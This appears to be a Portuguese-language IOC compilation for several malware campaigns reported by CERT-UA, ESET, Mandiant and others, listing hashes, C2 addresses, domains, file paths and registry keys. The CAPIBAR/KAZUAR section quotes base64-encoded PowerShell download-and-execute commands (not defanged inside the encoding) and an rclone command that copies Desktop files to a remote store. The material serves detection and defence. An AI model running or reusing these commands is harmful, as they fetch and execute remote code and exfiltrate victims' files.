decrease.bmp: 3376d2b5e6f99d68824b93bad33e4884 - cb81b6516f13844c653a9fcbbbeed099dde5be307ec66523be7678d577dca477
defensive.bmp: 9428c3fb7d4ae783a348561d5fa7b39e - 88dc766c51f20c93b670bd67b543b70e8d627c9afc041ee74aa6b64c59eb1c7d
defined.icn: dc7266e0eed4a67e1bea6e044c114387 a2361ca9fd84fd41d62628e2310317831f47f8e973c2bda24dadc0972fb983d6
delicacy.bmp: a1b63c92db35c90e1058813919446c21 - 9c724d00f28b3453e283e5b0ef5c8455bb61d4c902c53cfb38f07ffb4e17e18d
des.nds: 20531cf42e4f44a96c4aeb4cd7e2d70e - a0c2429616e7bf8a36951d45cbc72a1eab4d4a1a1e8266753a75bdd683737814

Rede:

138[.]197.199.151
139[.]59.166.152
144[.]202.61.174
157[.]245.99.132
159[.]203.11.73
168[.]100.10.184
178[.]62.108.75
192[.]241.133.108
194[.]180.174.73
45[.]61.138.226
45[.]61.139.22
45[.]77.196.211
45[.]77.237.252
66[.]42.102.21
70[.]34.218.135
hXXp://138[.]197.199.151/get[.]php
hXXp://139[.]59.166.152/get[.]php
hXXp://144[.]202.61.174/get[.]php
hXXp://157[.]245.99.132/get[.]php
hXXp://159[.]203.11.73/get[.]php
hXXp://178[.]62.108.75/get[.]php
hXXp://192[.]241.133.108/get[.]php
hXXp://194[.]180.174.73/1.txt
hXXp://194[.]180.174.73/pswd[.]php
hXXp://45[.]77.196.211/get[.]php
hXXp://45[.]77.237.252/get[.]php
hXXp://66[.]42.102.21/get[.]php
hXXp://70[.]34.218.135/get[.]php
hXXps://45[.]61.138.226
hXXp://atlantar[.]ru/get.php
hXXp://motoristo[.]ru/get.php
hXXp://lover.printing82.detroito[.]ru/DESKTOP-P5BRFLE/luncheon.nab
moolin[.]ru
atlantar[.]ru
bubenci[.]ru
callsol[.]ru
clipperso[.]ru
cooperi[.]ru
detroito[.]ru
farafauler[.]ru
fishitor[.]ru
flayga[.]ru
ganara[.]ru
detroito[.]ru
hawksi[.]ru
hofsteder[.]ru
kilitro[.]ru
kurapat[.]ru
leonardis[.]ru
lnasfe[.]ru
lopasts[.]ru
mafirti[.]ru
metanat[.]ru
mitlubald[.]ru
moolin[.]ru
motoristo[.]ru
paparat[.]ru
pasamart[.]ru
qkcew[.]ru
rncsq[.]ru
tarlit[.]ru
tbwelo[.]ru
wicksl[.]ru
xcqef[.]ru

NikoWiper (ESET)

OBS: Não encontrei os IOCs desse malware

SwiftSlicer (ESET)

7346E2E29FADDD63AE5C610C07ACAB46B2B1B176

RoarBAT (CERT-UA)

Arquivos:

UpdateRarService: c0a7da9ba353c272a694c2f215b29a63 76f06d84d24d080201afee5095e4c9a595f7f2944d9911d17870653bbfefefe8
update1.bat (RoarBat): 6b30bd1ff03098dcf78b938965333f6e 27ff9d3f925f636dcdc0993a2caaec0fa6e05c3ab22700f055353a839b49ab38
WinRAR.exe (Command line RAR): 4e75f4c7bcc4db8ff51cee9b192488d6 cb3cc656bb0d0eb8ebea98d3ef1779fb0c4eadcce43ddb72547d9411bcd858bc

Hosts:

C:\Users\update1.bat
UpdateRarService

Redes:

188.72.101[.]3
188.72.101[.]4
194.28.172[.]172
194.28.172[.]81

PowerMagic e CommonMagic (Kaspersky)

Em 21/03/2023 a Kaspersky divulgou que, em Outubro de 2022, diversas organizações do governo de transporte e agricultura nas regiões da Criméia, Donetsk e Lugansk foram alvos de uma campanha de phishing para distribuir o backdoor PowerMagic;
Arquivos:

новое отмена решений уик 288.zip (new cancellation of resolution local election committee 288.zip) (Lure archives: 0a95a985e6be0918fdb4bfabf0847b5a
ecb7af5771f4fe36a3065dc4d5516d84 внесение_изменений_в_отдельные_законодательные_акты_рф.zip (making changes to several russian federation laws.zip)
гражданин рб (redacted) .zip (citizen of republic of belarus (redacted).zip): 765f45198cb8039079a28289eab761c5
цик 3638.zip (central election committee 3638.zip): ebaf3c6818bfc619ca2876abd6979f6d
сз 14-1519 от 10.08.22.zip (memo 14-1519 dated 10.08.22.zip): 1032986517836a8b1f87db954722a33f
приказ минфина днр № 176.zip (dpr ministry of finance order #176.zip): 1de44e8da621cdeb62825d367693c75e
attachment.msi (PowerMagic installer): fee3db5db8817e82b1af4cedafd2f346
service_pack.dat (PowerMagic dropper): bec44b3194c78f6e858b1768c071c5db
manutil.vbs (PowerMagic loader): 8c2f5e7432f1e6ad22002991772d589b
PowerMagic backdoor: 1fe3a2502e330432f3cf37ca7acbffac
All.exe (CommonMagic loader): ce8d77af445e3a7c7e56a6ea53af8c0d
Clean.exe (CommonMagic cryptography module): 9e19fe5c3cf3e81f347dd78cf3c2e0c2
Overall.exe (CommonMagic network communication module): 7c0e5627fd25c40374bc22035d3fadd8

Distribution servers:

webservice-srv[.]online
webservice-srv1[.]online
185.166.217[.]184

BEACON e MICROBACKDOOR (Mandiant)

Arquivos usados no ataque de phishing:

план евакуації (затверджений сбу 28.02.2022 наказом № 009363677833).rar_pass_123.zip: cd8834da2cfb0285fa75decf6c67d049 (MD5)
План евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).rar: 3cd599654aff2e432ae3390d33c64f5e (MD5)
код доступу.txt: 144ccb808e2d2e1f0119ea2a8f7490bc (MD5)
План евакуації (затверджений СБУ 28.02.2022 Наказом № 009363677833).exe: ea47d88d73fecb1fad1e737f1b373d7f (MD5)
Заборгованість по зарплаті.xls: da305627acf63792acb02afaf83d94d1 (MD5)

C:\Program Files (x86)\Remote Utilities – Host\ rutserv.exe: 2bb5d5aa07fa2c8e9874c117c8fa51d6 (MD5)
Base-Update.exe: 06124da5b4d6ef31dbfd7a6094fc52a6 (MD5) (downloader written in Go)
%TEMP%\java-sdk.exe: 36ff9ec87c458d6d76b2afbd5120dfae (MD5)
oracle-java.exe: 4a5de4784a6005aa8a19fb0889f1947a (MD5)
microsoft-cortana.exe: 6b413beb61e46241481f556bb5cdb69c (MD5)
C&Cs server (over TCP):

111.90.151[.]182:5651
111.90.151[.]182:8080
111.90.151[.]182:5555
111.90.151[.]182:4899
194.31.98[.]124:80
194.31.98[.]124:443

GRIMPLANT e GRAPHSTEEL (Mandiant / US Cyber Command / CERT-UA)

Arquivos usados no ataque de phishing:

довідка.zip (translation: Certificate.zip): e34d6387d3ab063b0d926ac1fca8c4c4 (MD5)
dovidka.chm: 2556a9e1d5e9874171f51620e5c5e09a (MD5)

%STARTUP%\Windows Prefetch.lNk: 8fc42ee971ab296f921bb05633f6b4a6 (MD5)
C:\Users\Public\Favorites\desktop.ini: a9dcaf1c709f96bc125c8d1262bac4b6 (MD5)
C:\Users\Public\Libraries\core.dll: d2a795af12e937eb8a89d470a96f15a5 (MD5) (Follow-on payload)
client.dll (MICROBACKDOOR backdoor): 047fbbb380cbf9cd263c482b70ddb26f (MD5)
C&C: xbeta[.]online:8443

Campanha "Cloaked Ursa" (Unit-42)

Samples:

311e9c8cf6d0b295074ffefaa9f277cb1f806343be262c59f88fbdf6fe242517
8902bd7d085397745e05883f05c08de87623cc15fe630b36ad3d208f01ef0596
47e8f705febc94c832307dbf3e6d9c65164099230f4d438f7fe4851d701b580b
79a1402bc77aa2702dc5dca660ca0d1bf08a2923e0a1018da70e7d7c31d9417f
38f8b8036ed2a0b5abb8fbf264ee6fd2b82dcd917f60d9f1d8f18d07c26b1534
706112ab72c5d770d89736012d48a78e1f7c643977874396c30908fa36f2fed7
c62199ef9c2736d15255f5deaa663158a7bb3615ba9262eb67e3f4adada14111
cd4956e4c1a3f7c8c008c4658bb9eba7169aa874c55c12fc748b0ccfe0f4a59a
0dd55a234be8e3e07b0eb19f47abe594295889564ce6a9f6e8cc4d3997018839
60d96d8d3a09f822ded0a3c84194a5d88ed62a979cbb6378545b45b04353bb37
03959c22265d0b85f6c94ee15ad878bb4f2956a2b0047733edbd8fdc86defc48

URLs:

hxxp://tinyurl[.]com/ysvxa66c
hxxp://t[.]ly/1IFg
hxxps://resetlocations[.]com/bmw.htm
hxxps://tinyurl[.]com/mrxcjsbs
hxxps://simplesalsamix[.]com/e-yazi.html
hxxps://www.willyminiatures[.]com/e-yazi.html

Endereços de e-mail que enviaram os phishings:

dawid.tomaszewski@resetlocations[.]com
ops.rejon4@kazmierz[.]pl

Corona (CISCO Talos) (IOCs)

Arquivos:

f11310f075171f8502bcd32dcb2fe5894808b17a37f6fd960fb26653871e7b7d
6b310bd23806272f6c69b84a0381915f16d705e79ce423f19de940247543c76a
a7b7691baa21ad118348661a035b69605a6efd1cd1fa0fd52e5645c64f5f61e6
1a0e930fbdab2266e14dc501abdbb5623b5762d687df3670d86bb05f252509ac
0397c586fa56e672db7f14afa8c19992b6e08ab0c1d282c960df1af26371bd72
ce96fe99ebe30ae44e74c22c0b2a055005d0da131e0082a1c290ddeb79dd1114
5039d76e697f242c36c5a0ebf7dec127757bc34ddaf33c58251c2798da3ce03e
a58da0e6a20fed03364a0cbae18008eb4f8d6bee7c9f5e8ffcdac34fb823d363
7e35ce60d80c85e050133de142a3b261160259846c9c967c7b2bb84923328f8c
27a061daee3ec9cff928b8152159a472797821834a3aa7639749489b90f703c3
c7ec4570524ad59d5bd7a3e8f0d23c8cf05cc0e8a98dcdbec00c9dc075084558
aea76f905b0169e4289895a8d85980896f802fd18fe246a27d601310bfa5905e
7a9a5317a88afb53b44f6cfed59c48907f63aaa7ef63b1587f990951c423c211
0f189246247c51a701d5a88a06e1fc4932f333d24d7ff40dc8152ad6224f6ca4
41f050f3d003edd67ec02710c60a7b4022685465cb61ae37fc0b3193c1dab5cb
1c118d8fb0be904b129e4552f86cd0b3e239ecd25f4d599c54cc96c1096747af
e41b3bdbfb816d5cfd4b235d2b985894153c41da6726ebfa83e45f3b5b4a1945
6e6f5bebd6bf0fd0b626d6521cdb4faa06275f558bacd419c76702e2728f734c
dd61887d5cdf361a335fec917cd6d1bb186aad56b1f9f5d09b66355ff7f41751
40b87c5444e03b6b4f3d38315c1525cedfafc20355fff84502cc594799dc41df
d3f012662c44293ae07d8c763914db18fc9795673da7c1cdc4d862b1a7c887b9
6837c16dce562abf4c55949cfc8d00b019f7fcc6db6a2e9a71d268312fba813e
f00939201f7e77221e94e917a8e34c3d2143324e02fdf35058526d870a0023a0
71c0881d35f769fe58c084883d2aaee9ec284fcdc04500e5e5272973dfc78944
00030b0db567afa524eb68faf6f194f25bc5361c380599668a82dbae12af088e
a7a7c4062ced46275638719c100ea2397c673148e8473e56a3ec4313ca7dc5f9
4d9cca1d75d4691e794dfe9efb9eef6e9e64b4e978ad17831b459d4bb6722829
4da99f963c26bcc4537ba0437c9cc1445be8bea64067d34308dda6c2e49c8c65
4cedec3e1a2f72a917ad9a59ebe116ed50c3268567946d1e493c8163486b888b
df33b1187c20582560ffaa1c3e86b92003c4a7c8a61acbbe886ab195531c5c89
bec98a8a5e6786ef415a7a7bf7e60cbd384d43ede4e882aa560fdcb24865ac55
00fdb03518c238dc649a39e94f0bcc95dacf3b832979d14d0ed5194b9b482b87
991a19fb00cda372dd1ce4a42580dc40872da5c5bfbb34301615f3870ea3fb58
2c5ba56a41f40bac2f21065fb9883545ef8d359883cb7bc351c481cb9542e104
44fd895174a7c1c0019fc95bb04201106dc165704c70e902e3de58db98f03c7e
30d46a740e2677c8fee383c2a4762561a10c66c5b99215262e42bfabf6bfb1aa
924d3589d642e8fd65746dc156ff9f104d43114a04ea9509f51ee6a439d1915b
ecafe10f0f7d6a9ae94d9735b45f88492b6ea11ff58f37e62fbf7070778af20a
bc92a5b1c4205ea1fbfec9144b8aab485e095142c7105c9d616b089ec668f198
ea5a8f1052e40cb6bcebf384fe67a6920b3651fbd8f3a34a844f39789ebc4d5f
ad8e3ebd496fb4d97e5075adb4f2f1b91195cca059800d0acd182a07698c13b6
3670115fa5fac918ad0dafe399568788690f0f205dd0bebe4f55180fd70d36e9
5969180b072703709764d1ca40be3eeb40f2eb0090859b3743cc21b884fa2106
a5fb6b9417e50bd2260afdcdb5a9eed33e48a283a51408344a4caa2b1025b9a7
c0c455cd3e18be14d2e34cf4e3fb98e7ab0a75ef04b6049ff9f7b306d62704b8
0f3bdbc64446555c6ff611b02f2e64250fcaf39b78237ae4cca7c74d94731b32
35d1e819d2ac2535f0aa9e2294570135f37519386872c415e326146e931b8fb9
5a4bd78a4d3d1a772e9e9b14983646a4c1c6a25cc983b804e4522774ebfa1c14
c40e6b176ad3fd7332cd217191e557352ef4b82bf91f29939121267598737990
e9bbe7c6705a6f5a78c2a9b8060a7e32374b81058f7c2f24851c4d1ea38d7411
73a21c1492996794688d9751edd1e5c287da645fa7a960e945bb4ea69855424a
7893965d1861c712b751bc2d5fb53a34ec0d276bcf389b7fc574728940575152

everything-everywhere.at.ply[.]gg
IP: 94.131.108.[]109
Domínios:

hxxps[://]wuzhenfestival[.]site/5109c46d40f801a862c96e628f83faca[.]png
hxxps[://]onyangdol[.]site/thumb_d_F3D14F4982A256B5CDAE9BD579429AE7[.]jpg
hxxps[://]kebhana[.]site/Believe-Me-Lyrics[.]jpg
hxxps[://]wordrow[.]website/pictures-91[.]jpg
hxxps[://]ellechina[.]online/01_logo_HLW-300x168[.]jpg
hxxps[://]sellmyhousequickly[.]website/dangjiansigeyishibiaoyuxuanchuanguahua[.]jpg
hxxps[://]frivol[.]space/memnet-profiles/A10818[.]jpg
hxxps[://]wordrow[.]website/pictures-91[.]jpg
hxxps[://]simplifymedia[.]pw/images/bnd/news/23908t5[.]png
hxxps[://]hssenglish[.]pw/fonini/pundit/leaf_background[.]jpg
hxxps[://]mingxing[.]pw/content/_processed_/f/a/_742fa0bbd1[.]jpg
hxxps[://]mingxing[.]pw/datastream/thumb_b/43950sec[.]jpg
hxxps[://]carpetmarker[.]pw/images/Carpet_Shop_3b09adf[.]jpg
hxxps[://]bourns[.]space/p/covers/assets/images/lee-leopard[.]jpg

CAPIBAR e KAZUAR (CERT-UA#6981)

Arquivos:

localhost.mof (CAPIBAR server (MOF)): cdf7fa901701ea1ef642aeb271c70361 1c97f92a144ac17e35c0e40dc89e12211ef5a7d5eb8db57ab093987ae6f3b9dc
Pending.mof (CAPIBAR server (MOF)): 153b713b3c6e642f39993d65ab33c5f0 5cf64f37fac74dc8f3dcb58831c3f2ce2b3cf522db448b40acdab254dd46cb3e
Server.dll (CAPIBAR server): 9ececb4acbf692c2a8ea411f2e7dd006 07f9b090172535089eb62a175e5deaf95853fdfd4bcabf099619c60057d38c57
Control.dll (CAPIBAR): 5c7466a177fcaad2ebab131a54c28fab bd7dbaf91ba162b6623292ebcdd2768c5d87e518240fe8ca200a81e9c7f01d76
logon.aspx: b63c2ec9a631e0217d39c4a43527a0ce 1c1bb64e38c3fbe1a8f0dcb94ded96b332296bcbf839de438a4838fb43b20af3
logon[1].aspx: 420b7dc391f2cb0a9a684c1c48c334e2 01c5778be73c10c167fae6d7970c0be23a29af1873d743419b1803c035d92ef7
logon[1].aspx: 491e462bf1213fede82925dea5df8fff ba2c8df04bcba5c3cfd343a59d8b59b76779e6c27eb27b7ac73ded97e08f0f39
SYNC[1]: 9dd2bea4f2df8d3ef51dc10c6db2e07a aaf7642f0cab75240ec65bc052a0a602366740b31754156b3a0c44dccec9bebe
wp-file-script.js: 8c56c22343853d3797037bdac2cec6c7 d4d7c12bdb66d40ad58c211dc6dd53a7494e03f9883336fa5464f0947530709f
Control.dll (CAPIBAR): 17402fc21c7bafae2c1a149035cd0835 19b7ddd3b06794abe593bf533d88319711ca15bb0a08901b4ab7e52aab015452
Control.dll (CAPIBAR): d3065b4b1e8f6ecb63685219113ff0b8 4ef8db0ca305aaab9e2471b198168021c531862cb4319098302026b1cfa89947
two.exe (CAPIBAR): 5210b3d85fd0026205baee2c77ac0acd 64e8744b39e15b76311733014327311acd77330f8a135132f020eac78199ac8a
Config.dat: 4065e647380358d22926c24a63c26ac4 5e122ff3066b6ef2a89295df925431c151f1713708c99772687a30c3204064bd
Senatorial.exe (KAZUAR): 11a289347b95aab157aa0efe4a59bf24 91dc8593ee573f3a07e9356e65e06aed58d8e74258313e3414a7de278b3b5233
1.ps1: cba1f4c861240223332922d2913d18e5 b8ee794b04b69a1ee8687daabfe4f912368a500610a099e3072b03eeb66077f8
message (Steel Signal's "config.json", "db.sqlite"): 65102299bf8d7f0129ebbcb08a9c2d98 8168dc0baea6a74120fbabea261e83377697cb5f9726a2514f38ed04b46c56c8

Arquivos:

C:\Windows\System32\config\systemprofile\AppData\Roaming\ASKOD\localhost.mof
C:\Windows\System32\config\systemprofile\AppData\Roaming\ZOV\localhost.mof
C:\Windows\System32\Configuration\Pending.mof
C:\ProgramData\ASUS\ASUS System Control Interface\AsusSoftwareManager\Config.dat
%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\8HIA0N4E\logon[1].aspx
%LOCALAPPDATA%\assembly\dl3\QKP9W8EK.5CJ\XRNLX3QV.5BO\3d7183c9\00000000_00000000\__AssemblyInfo__.ini
%LOCALAPPDATA%\assembly\dl3\QKP9W8EK.5CJ\XRNLX3QV.5BO\3d7183c9\00000000_00000000\logon.aspx
%LOCALAPPDATA%\Microsoft\OneDrive\Update\UpdateService.exe
%LOCALAPPDATA%\Microsoft\OneDrive\Update\rclone.conf
%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE\UOIQCADZ\SYNC[1]
powershell -e JAB3AD0AbgBlAFcALQBPAGIAagBFAGMAdAAgAHMAeQBzAHQAZQBtAC4AbgBlAHQALgB3AEUAYgBjAEwAaQBlAE4AdAA7ACQAZgBpAGwAZQA9ACQAdwAuAEQAbwB3AG4ATABvAGEAZABTAHQAUgBpAE4AZwAoACcAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQBkAGUAbABhAGkAZABhAC4AdQBhAC8AcABsAHUAZwBpAG4AcwAvAHYAbQBzAGUAYQByAGMAaAAvAHcAcAAtAGMAbwBuAGYAaQBnAC0AdABoAGUAbQBlAHMALgBwAGgAcAAnACkAOwBpAEUAeAAgACQAZgBpAGwAZQA=
powershell -e JABHAHIAcQBkAHEAdwBkAGUAPQBOAGUAdwAtAE8AYgBqAEUAYwBUACAAUwBZAHMAVABlAE0ALgBOAEUAdAAuAFcAZQBiAEMATABpAGUATgB0ADsAJABpAHUAYQBXAD0AJABHAHIAcQBkAHEAdwBkAGUALgBEAE8AdwBOAEwATwBhAEQAUwB0AFIAaQBOAGcAKAAnAGgAVAB0AFAAcwA6AC8ALwBhAGwAZQBpAG0AcABvAHIAdABhAGQAbwByAGEALgBuAGUAdAAvAGkAbQBhAGcAZQBzAC8AcwBsAGkAZABlAHMAXwBsAG8AZwBvAC8AJwApADsAYABpAG4AdgBPAGAASwBlAGAALQBgAEUAeABgAFAAcgBlAHMAcwBgAEkAbwBgAE4AIAAkAGkAdQBhAFcA
$w=neW-ObjEct system.net.wEbcLieNt;$file=$w.DownLoadStRiNg('hxxps://www.adelaida[.]ua/plugins/vmsearch/wp-config-themes.php');iEx $file $Grqdqwde=New-ObjEcT SYsTeM.NEt.WebCLieNt;$iuaW=
$Grqdqwde.DOwNLOaDStRiNg('hxxPs://aleimportadora[.]net/images/slides_logo/');invOKe-ExPressIoN $iuaW "C:\Users\%USERNAME%\AppData\Local\Microsoft\OneDrive\Update\UpdateService.exe" "copy" "C:\Users\%USERNAME%\Desktop" "remote:%COMPUTERNAME%\Desktop" "--include" "*.{{jpe?g|txt|docx?|rtf|pdf|xlsx?|xlsm|pptx?|zip|rar|7z}}" "-M" "--max-size" "50M" "--max-age" "200d" "--bwlimit" "1M:1M" "--order-by" "modtime,desc" "--log-file=C:\Users\%USERNAME%\AppData\Local\Microsoft\OneDrive\Update\log_1.dat" "-vv"
\Mozilla\Updates Firefox Browser (Scheduled Task)
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness1
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Gentling\Maleness2
HKEY_CURRENT_USER\SOFTWARE\Microsoft\GameBarApi\GameBarId
HKEY_CURRENT_USER\Software\Classes\CLSID\{84F0FAE1-C27B-4F6F-807B-28CF6F96287D}\InprocServer32\1.0.0.0\CodeBase
HKEY_CURRENT_USER\Software\Classes\CLSID\{8989946A-2F3B-4BE9-874E-D0B2B534ACA0}\ScriptletURL HKEY_CURRENT_USER\Software\Classes\CLSID\{84f0fae1-c27b-4f6f-807b-28cf6f96287d}\ScriptletURL Мережеві:

Domínios:

hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-config-plugins.php
hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-config-themes.php
hXXps://www.adelaida[.]ua/plugins/vmsearch/wp-file-script.js
hXXps://atomydoc[.]kg/src/open_center/
hXXps://atomydoc[.]kg/src/open_center/?page=ccl
hXXps://atomydoc[.]kg/src/open_center/?page=fst
hXXps://atomydoc[.]kg/src/open_center/?page=snd
hXXps://atomydoc[.]kg/src/open_center/?page=trd
hXXps://aleimportadora[.]net/images/slides_logo/
hXXps://aleimportadora[.]net/images/slides_logo/?page=
hXXps://aleimportadora[.]net/images/slides_logo/fg/message
hXXps://aleimportadora[.]net/images/slides_logo/fg/music
hXXps://aleimportadora[.]net/images/slides_logo/fg/video
hXXps://aleimportadora[.]net/images/slides_logo/index.php
hXXps://octoberoctopus.co[.]za/wp-includes/sitemaps/web/
hXXps://sansaispa[.]com/wp-includes/images/gallery/
hXXps://www.pierreagencement[.]fr/wp-content/languages/index.php
hXXps://mail.aet.in[.]ua/outlook/api/logon.aspx
hXXps://mail.kzp[.]bg/outlook/api/logon.aspx
hXXps://mail.numina[.]md/owa/scripts/logon.aspx (CAPIBAR C2URL)
hXXps://mail.aet.in[.]ua/outlook/api/logoff.aspx (CAPIBAR C2URL)
hXXps://mail.arlingtonhousing[.]us/outlook/api/logoff.aspx (CAPIBAR C2URL)
hXXps://mail.kzp[.]bg/outlook/api/logoff.aspx (CAPIBAR C2URL)
hXXps://mail.lechateaudelatour[.]fr/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE/RPCWITHCERT/SYNC (CAPIBAR C2URL)
hXXps://mail.lebsack[.]de/MICROSOFT.EXCHANGE.MAILBOXREPLICATIONSERVICE.PROXYSERVICE/RPCWITHCERT/SYNC (CAPIBAR C2URL)

Infamous Chisel (NCSC)

Domain: www[.]geodatatool[.]com
C2 communication: POST /server[.]php?ver=16&bid=%s&type=%d HTTP/1.1\r\n User-Agent: curl/7.47\r\n
Paths:

/system/bin/netd_
/data/local/tmp/.syscache.csv
/data/local/tmp/.syspackages.csv
/data/local/tmp/.sysinfo.csv
/data/local/tmp/.aid.cache
/data/local/tmp/.android.cache.sh
/sdcard/Android/data/.google.index
/storage/emulated/0/Android/data/.google.index
/storage/emulated/1/Android/data/.google.index
/data/local/td
/data/local/prx.cfg
/data/local/prx
/data/local/prx/cached-certs
/data/local/prx/cached-microdesc-consensus
/data/local/prx/cached-microdescs
/data/local/prx/cached-microdescs.new
/data/local/prx/lock
/data/local/prx/state
/data/local/prx/hs
/data/local/prx/hs/hostname
/data/local/prx/hs/hs_ed25519_public_key
/data/local/prx/hs/hs_ed25519_secret_key
/data/local/blob
/data/local/killer
/data/local/db
/data/local/NDBR_armv7l
/data/local/NDBR_i686

MerlinAgent (Securonix)

Arquivos:

Інфо про навчання по БПЛА для військових.v2.2.chm: 68A224AD49F2BD3D82EF6FCF5B16472DD06FECFF816263925DFB9BAC91951B21 (SHA-256)
g1h7zr.bin: 46FA63AF33FB7A42D3F79ED81D38E5CADDA7D311B07B2306E917179948189C7A (SHA-256)
ctlhost.exe: 4659D371C9B6DB1687D6DD027E95563DA88A29378DE4F87DB19B267859D04D03 (SHA-256)

C2 Address:

catbox[.]moe
listen[.]servemp3[.]com
168[.]100[.]8[.]245

LittleDrifter (Checkpoint) (NOVO)

Samples (MD5)

cbeaedfa84b02a2bd41a70fa92a46c36
6349dd85d9549f333117a84946972d06
2239800bfc8fdfddf78229f2eb8a7b95
42bc36d5debc21dff3559870ff300c4e
4c2431e5f868228c1f286fca1033d221
1536ec56d69cc7e9aebb8fbd0d3277c4
49d1f9ce1d0f6dfa94ad9b0548384b3a
83500309a878370722bc40c7b83e83e3
8096dfaa954113242011e0d7aaaebffd
bbb464b327ad259ad5de7ce3e85a4081
cdae1c55ec154cd6cef4954519564c01
2996a70d09fff69f209051ce75a9b4f8
9d9851d672293dfd8354081fd0263c13
96db6240acb1a3fca8add7c4f9472aa5
1c49d04fc0eb8c9de9f2f6d661826d24
88aba3f2d526b0ba3db9bc3dfee7db39
86d28664fc7332eafb788a44ac82a5ed
1da0bf901ae15a9a8aef89243516c818
579f1883cdfd8534167e773341e27990
495b118d11ceae029d186ffdbb157614

Infrastrutura:

ozaharso[.]ru
nubiumbi[.]ru
acaenaso[.]ru
atonpi[.]ru
suizibel[.]ru
dakareypa[.]ru
ahmozpi[.]ru
nebtoizi[.]ru
squeamish[.]ru
nahtizi[.]ru
crisiumbi[.]ru
arabianos[.]ru
gayado[.]ru
quyenzo[.]ru
credomched[.]ru
lestemps[.]ru
urdevont[.]ru
hoanzo[.]ru
absorbeni[.]ru
aethionemaso[.]ru
aychobanpo[.]ru
ayzakpo[.]ru
badrupi[.]ru
barakapi[.]ru
boskatrem[.]ru
brudimar[.]ru
decorous[.]ru
dumerilipi[.]ru
heartbreaking[.]ru
judicious[.]ru
karoanpa[.]ru
lamentable[.]ru
procellarumbi[.]ru
ragibpo[.]ru
raidla[.]ru
ramizla[.]ru
samiseto[.]ru
superficial[.]ru
talehgi[.]ru
undesirable[.]ru
valefgo[.]ru
vasifgo[.]ru
vilaverde[.]ru
vloperang[.]ru
zerodems[.]ru
geminiso[.]ru
boskatrem[.]ru
sabirpo[.]ru
vloperang[.]ru
decorous[.]ru
ramizla[.]ru
procellarumbi[.]ru
andamanos[.]ru
triticumos[.]ru

LONEPAGE (Deep Instinct) (NOVO)

Rede:

147.78.46[.]40
196.196.156[.]2
2.59.222[.]98

Arquivos:

SFX: d21aa84542303ca70b59b53e9de9f092f9001f409158a9d46a5e8ce82ab60fb6
LNK: 0eec5a7373b28a991831d9be1e30976ceb057e5b701e732372524f1a50255c7
VBS: 8aca535047a3a38a57f80a64d9282ace7a33c54336cd08662409352c23507602
Decoy: 2c2fa6b9fbb6aa270ba0f49ebb361ebf7d36258e1bdfd825bc2faeb738c487ed
SFX: 659abb39eec218de66e2c1d917b22149ead7b743d3fe968ef840ef22318060fd
LNK: 0aa794e54c19dbcd5425405e3678ab9bc98fb7ea787684afb962ee22a1c0ab51
VBS: 4e8de351db362c519504509df309c7b58b891baf9cb99a3500b92fe0ef772924
Decoy: 53812d7bdaf5e8e5c1b99b4b9f3d8d3d7726d4c6c23a72fb109132d96ca725c2
HTA: 38b49818bb95108187fb4376e9537084062207f91310cdafcb9e4b7aa0d078f9
VBS: a10209c10bf373ed682a13dad4ff3aea95f0fdcd48b62168c6441a1c9f06be37
Decoy: 61a5b971a6b5f9c2b5e9a860c996569da30369ac67108d4b8a71f58311a6e1f1
SFX: 86549cf9c343d0533ef80be2f080a7e3c38c77a1dfbde0a2f89048127979ec2a
LNK: 762c7289fb016bbcf976bd104bd8da72e17d6d81121a846cd40480dbdd876378
VBS: 39d56eab8adfe9eb244914dde42ec7f12f48836d3ba56c479ab21bdbc41025fe
Decoy: f75f1d4c561fcb013e262b3667982759f215ba7e714c43474755b72ed7f9d01e
CVE-2023-38831 ZIP: 986694cad425c8f566e4e12c104811d4e8b30ce6c4c4d38f919b617b1aa66b05
CVE Payload: 54458ebfbe56bc932e75d6d0a5c1222286218a8ef26face40f2a0c0ec2517584
VBS: 96ab977f8763762af26bad2b6c501185b25916775b4ed2d18ad66b4c38bd5f0d
Decoy: 6a638569f831990df48669ca81fec37c6da380dbaaa6432d4407985e809810da
CVE-2023-38831 ZIP: 87291b918218e01cac58ea55472d809d8cdd79266c372aebe9ee593c0f4e3b77
CVE Payload: f5f269cf469bf9c9703fe0903cda100acbb4b3e13dbfef6b6ee87a907e5fcd1b
VBS: e34fc4910458e9378ea357baf045e9c0c21515a0b8818a5b36daceb2af464ea0
SFX: 2a3da413f9f0554148469ea715f2776ab40e86925fb68cc6279ffc00f4f410dd
LNK: 0acd4a9ef18f3fd1ccf440879e768089d4dd2107e1ce19d2a17a59ebed8c7f5d
VBS: 6f5f265110490158df91ca8ad429a96f8af69ca30b9e3b0d9c11d4fef74091e8
Decoy: 736c0128402d83cd3694a5f5bb02072d77385c587311274e3229e9b2fd5c5af7

MASEPIE (CERT-UA)

Arquivos:

2.txt: 9724cecaa8ca38041ee9f2a42cc5a297 4fa8caea8002cd2247c2d5fd15d4e76762a0f0cdb7a3c9de5b7f4d6b2ab34ec6
2.ps1 (STEELHOOK): 5f126b2279648d849e622e4be910b96c 6bae493b244a94fd3b268ff0feb1cd1fbc7860ecf71b1053bf43eea88e578be9
Client.py (MASEPIE): 47f4b4d8f95a7e842691120c66309d5b 18f891a3737bb53cd1ab451e2140654a376a43b2d75f6695f3133d47a41952b6
VMSearch.sfx.exe: 8d1b91e8fb68e227f1933cfab99218a4 6d44532b1157ddc2e1f41df178ea9cbc896c19f79e78b3014073af2d8d9504fe
VMSearch.exe (OCEANMAP): 6fdd416a768d04a1af1f28ecaa29191b fb2c0355b5c3adc9636551b3fd9a861f4b253a212507df0e346287110233dc23
VMSearch.exe (OCEANMAP): 5db75e816b4cef5cc457f0c9e3fc4100 24fd571600dcc00bf2bb8577c7e4fd67275f7d19d852b909395bebcbb1274e04
KFP.311.152.2023.pdf .lnk: 6128d9bf34978d2dc7c0a2d463d1bcdd 19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc
